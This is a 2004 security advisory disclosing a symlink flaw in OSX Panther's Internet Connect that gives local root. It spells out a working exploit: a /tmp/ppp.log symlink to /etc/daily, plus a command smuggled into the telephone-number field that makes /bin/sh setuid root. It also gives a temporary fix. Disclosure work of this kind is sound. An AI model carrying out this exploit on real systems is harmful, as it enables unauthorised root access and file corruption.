Apple OSX Panther Internet Connect - Local root Vulnerability. ==============================================================
Date: 25.07.2004 Author: B-r00t. 2004. Email: B-r00t <br00t@xxxxxxxxxxxxxxxx>
Operating System: OSX Panther (Possibly Previous Versions).
Problem: Internet Connect allows any file on the file system to be altered.
Description: Apples Internet Connect application creates a 'ppp.log' file in '/tmp/'. If the file already exists it is opened in append mode. If it does not exist a new file is created.
It is possible to trick Internet Connect into appending data to any file on the filesystem by creating a symlink file '/tmp/ppp.log' pointing to the file to be altered.
If the file '/tmp/ppp.log' already exists, the attack is not possible as the file is owned by user 'root' and group 'wheel': -
$ ls -l /tmp/ppp.log -rw-r--r-- 1 root wheel 807 24 Jul 23:44 /tmp/ppp.log
However, due to the Operating System clearing the '/tmp' directory during system startup and also on a regular basis due to system maintenance, it becomes possible to form the attack as shown below:
First a file is created to represent a system file, owned and only writable by user 'root'.
maki:~ # echo "TEST" > /etc/file_owned_by_root maki:~ # ls -l /etc/file_owned_by_root -rw-r--r-- 1 root wheel 5 25 Jul 00:09 /etc/file_owned_by_root maki:~ # cat /etc/file_owned_by_root TEST A symlink is now created in the '/tmp' directory to point to the file to be altered. It is important to realise that the link can be created as a none 'admin' or 'root' user.
maki:/tmp $ id uid=502(br00t) gid=502(br00t) groups=502(br00t)
Now Internet Connect is opened. Under 'configuration' choose 'Other'. Enter some text into the 'Telephone Number' box (B-r00t r0x y3r w0rld!) and click 'Connect'.
Checking the original file '/etc/file_owned_by_root' we see the following: -
maki:~ $ cat /etc/file_owned_by_root TEST Sun Jul 25 00:20:42 2004 : Version 2.0 Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld! Sun Jul 25 00:20:54 2004 : Terminating on signal 15. Sun Jul 25 00:20:58 2004 : Serial link disconnected.
As can be seen, data has been appended to the 'protected' file.
Impact: It is possible for a local user to escalate their privileges by appending data to specific system files. In addition, a malicious user may be able to render the machine unusable by corrupting important system files.
Exploit: This demonstration appends commands to the '/etc/daily' file which is executed by default at 3:15AM each day. An alternative attack might involve appending to any of the files that are sourced at system start up such as '/etc/rc.common'. This latter method is convenient if the user is able to reboot the machine. Create our link maki:~ $ ln -s /etc/daily /tmp/ppp.log
Open Internet Connect. Internal Modem -> Configuration -> Other
Internet Connect only allows certain characters to be used for the telephone number. The background '&' character allows our command string to execute amongst the time and date strings also appended.
Telephone Number: & cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 sh &
Check the '/etc/daily' file. maki:~ $ tail /etc/daily if [ -f /etc/security ]; then echo "" echo "Running security:" sh /etc/security 2>&1 | sendmail root fi
Now sit back and wait for cron to execute '/etc/daily' at 03:15AM. maki:~ $ date Sun Jul 25 03:13:43 CEST 2004
maki:/bin $ ls -l sh -r-xr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*
maki:/bin $ date Sun Jul 25 03:15:50 CEST 2004
maki:/bin $ ls -l sh -rwsr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*
maki:/bin $ sh maki:/bin # id uid=502(br00t) euid=0(root) gid=502(br00t) groups=502(br00t)
All thats left to do is clean up '/etc/daily' and remove the link '/tmp/ppp.log'
FIX: The following commands serve to provide a temporary fix until Apple release an official update.
Open a terminal: /Applications/Utilities/ Gain root access using 'sudo':
maki:~ $ sudo sh Password:[YOUR PASSWORD] maki:~ # whoami root
/usr/bin/touch /tmp/ppp.log echo '/usr/bin/touch /tmp/ppp.log' >> /etc/daily echo '/usr/bin/touch /tmp/ppp.log' >> /etc/rc.common
These commands ensure that a '/tmp/ppp.log' file is present to prevent a user from creating a link as shown above. Alternatively the line:
can be added to each file '/etc/daily' and '/etc/rc.common' manually using an editor and root privileges.
Shoutz: Marshal-L, Ruxsaw, Haggis & Kraft. s1, Blex & the old #cheese posse (RIP). Maz ... Good Luck For The Wedding!
B#. --
---------------------------------------------------- Email : B-r00t <br00t@xxxxxxxxxxxxxxxx> Key fingerprint = 74F0 6A06 3E57 083A 4C9B ED33 AD56 9E97 7101 5462
"There's no way a highschool punk can put a dime into a telephone and break into our system." -----------------------------------------------------
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